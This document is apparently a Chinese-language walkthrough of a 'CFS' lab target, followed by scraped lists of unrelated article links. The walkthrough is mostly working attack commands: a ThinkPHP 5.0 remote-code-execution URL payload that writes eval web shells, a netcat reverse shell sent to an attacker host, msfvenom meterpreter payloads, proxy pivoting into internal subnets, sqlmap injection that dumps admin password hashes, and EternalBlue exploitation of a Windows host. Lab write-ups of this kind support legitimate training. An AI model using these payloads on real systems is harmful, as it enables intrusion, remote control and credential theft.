nmap扫描

nmap -sV -p1-65535 192.168.1.135

thinkphp5.0版本

找到poc进行测试

http://192.168.1.135/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://192.168.1.135/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > 1.php

写入成功

进行转义

http://192.168.1.135/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST['cmd']);?>" >2.php

或者使用base64位编码

<?php @eval($_POST['cmd']);?>

转码位

PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=

http://192.168.1.103/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4="| base64 -d > 3.php

反弹kali

nc 192.168.1.104 6666 -e /bin/bash

kali获取bash

python -c 'import pty;pty.spawn("/bin/bash")'

flag

msf生成木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=1234  -f elf >1.elf

蚁剑上传

chmod 777 1.elf

./elf

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.128

msf5 exploit(multi/handler) > set lport 1234

msf5 exploit(multi/handler) > run

获取当前的网段

run get_local_subnets

添加理由

run autoroute -s 192.168.22.0/24

run autoroute -p

内网扫描

msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp

msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389

msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24

msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128

设置socks4a代理

msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a

msf5 auxiliary(server/socks4a) > set srvport 2222

srvport => 2222

msf5 auxiliary(server/socks4a) > run

[*] Auxiliary module running as background job 0.

[*] Starting the socks4a proxy server

msf5 auxiliary(server/socks4a) >

修改proxychains

vim /etc/proxychains.conf

socks4     192.168.1.128     2222

proxychains nmap -Pn -sT 192.168.22.129

-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。

-sT:扫描TCP数据包已建立的连接connect

代理打开80网站

proxychains dirb http://192.168.22.129

注入

proxychains sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword

proxychains sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword --dbs

proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password –dump

admin | 46f94c8de14fb36680850768ff1b7f2a (123qwe)

登录后台

设置proxifier

msf生成木马

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=432 -f elf > 5.elf

这次代理使用的bindtcp是Target2作为监听

proxychains msfconsole

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.128

msf5 exploit(multi/handler) > set lport 432

msf5 exploit(multi/handler) > run

获取当前网段

run get_local_subnets

添加路由

run autoroute -s 192.168.33.0/24

run autoroute -p

msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a

msf5 auxiliary(server/socks4a) > set srvport 2223

srvport => 2223

msf5 auxiliary(server/socks4a) > run

[*] Auxiliary module running as background job 2.

[*] Starting the socks4a proxy server

msf5 auxiliary(server/socks4a) >

修改proxychains

vim /etc/proxychains.conf

socks4     127.0.0.1     2223

探测33网段

use auxiliary/scanner/portscan/tcp

msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389

msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24

msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128

端口扫描

proxychains nmap -Pn -sT 192.168.33.33

开放了445和3389端口

auxiliary/scanner/smb/smb_version

msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.33.33

rhosts => 192.168.33.33

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.33.33

rhost => 192.168.33.33

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec

msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf5 exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.33.33

RHOST => 192.168.33.33

msf5 exploit(windows/smb/ms17_010_psexec) > run

65001 UTF-8代码页 解决乱码

chcp 65001



CFS靶机的更多相关文章

  1. O(1)调度器的时间计算公式与CFS调度器

    http://blog.csdn.net/dog250/article/details/48750809 O(1): 优先级计算: 进程优先级公式:prio=MAX_RT_PRIO+nice+20其中 ...

  2. linux 提高进程优先级nice+ 进程调度CFS

    http://www.cnblogs.com/wang_yb/archive/2012/09/04/2670564.htmlhttp://liwei.life/2016/04/07/linux%E7% ...

  3. CFS: 虚拟运行时间

    http://edsionte.com/techblog/archives/4331 nice和prio的关系如下: #define NICE_TO_PRIO(nice) (MAX_RT_PRIO+n ...

  4. 进程的优先级 与 CFS 进程调度

    在Linux下改变进程的优先级 作者:曾老师,华清远见嵌入式学院讲师. 作为多任务的操作系统,Linux内核为每个创建的进程分配时间片并根据其优先级进行调度.当进程被创建时,其对应的task_stru ...

  5. 朴素UNIX它-Linux CFS注视

    该系列产品,被称为纯UNIX,但它也包含各种类别UNIX该系统的细节,自从完成我多年的学习笔记本系列文章,分析了各种UNIX,类UNIX思想和情感的实现. 这篇文章是比较短.只是分析Linux CFS ...

  6. Linux 2.6 完全公平调度算法CFS(Completely Fair Scheduler) 分析

    转会http://www.ibm.com/developerworks/cn/linux/l-completely-fair-scheduler/index.html? ca=drs-cn-0125 ...

  7. cfs

    转自:http://www.cnblogs.com/openix/p/3254394.html 下文中对于红黑树或链表组织的就绪队列,统称为用队列组织的就绪队列.                    ...

  8. linux内核cfs浅析

    linux调度器的一般原理请参阅<linux进程调度浅析>.之前的调度器cfs之前的linux调度器一般使用用户设定的静态优先级,加上对于进程交互性的判断来生成动态优先级,再根据动态优先级 ...

  9. CFS调度器(1)-基本原理

    首先需要思考的问题是:什么是调度器(scheduler)?调度器的作用是什么?调度器是一个操作系统的核心部分.可以比作是CPU时间的管理员.调度器主要负责选择某些就绪的进程来执行.不同的调度器根据不同 ...

随机推荐

  1. 【数论】8.30题解-prime素数密度 洛谷p1835

    prime 洛谷p1835 题目描述 给定区间[L, R](L <= R <= 2147483647, R-L <= 1000000),请计算区间中 素数的个数. 输入输出 输入 两 ...

  2. VisualCom软件仿真平台V1.0发布(附安装包下载链接)

    自我们借助VisualCom(暂定名称,后续可能会变更)软件平台撰写技术文章以来,有不少粉丝发私信询问该软件哪里来的,以及哪里有安装包,这里回复一下:VisualCom软件平台是由本微信公众号组织开发 ...

  3. Go语言中slice作为参数传递时遇到的一些“坑”

    前言 相信看到这个题目,可能大家都觉得是一个老生常谈的月经topic了.一直以来其实把握一个"值传递"基本上就能理解各种情况了,不过最近遇到了更深一点的"小坑" ...

  4. redis优化小建议

    1.优化的一些小建议 1.尽量使用短的key 当然在精简的同时,不要为了key的"见名知意".对于value有些也可精简,比如性别使用0.1. 2.每个redis设置合理内存 每个 ...

  5. 2020牛客NOIP赛前集训营-普及组(第二场) 题解

    目录 T1 面试 描述 题目描述 输入描述: 输出描述: 题解 代码 T2 纸牌游戏 描述 题目描述 输入描述: 输出描述: 题解 代码 T3 涨薪 描述 题目描述 输入描述: 输出描述: 题解 代码 ...

  6. 跟我一起学Go系列:Go gRPC 安全认证机制-SSL/TLS认证

    Go gRPC 系列: 跟我一起学Go系列:gRPC 拦截器使用 跟我一起学Go系列:gRPC 入门必备 第一篇入门说过 gRPC 底层是基于 HTTP/2 协议的,HTTP 本身不带任何加密传输功能 ...

  7. js jquey 笔记

    1.使用insertAfter 如果插入在tr后添加多行数据,数据会倒过来注意组字符串需要倒着循环 1).html方法,给元素添加html代码或者清空html代码(参数为空字符串): 2).appen ...

  8. Docker:docker搭建redis一主多从集群(配置哨兵模式)

    角色 实例IP 实例端口 宿主机IP 宿主机端口 master 172.19.0.2 6382 192.168.1.200 6382 slave01 172.19.0.3 6383 192.168.1 ...

  9. pybot参数

    p.p1 { margin: 0; font: 12px "Helvetica Neue" } p.p2 { margin: 0; font: 12px "Helveti ...

  10. ctf之SusCTF2017-Caesar cipher

    由题目名字SusCTF2017-Caesar cipher可知,该题目考察凯撒密码. 直接下载附件打开如图 由题目描述可知,提交的flag格式为Susctf{}.在网上搜索在凯撒密码解密. 偏移量为3 ...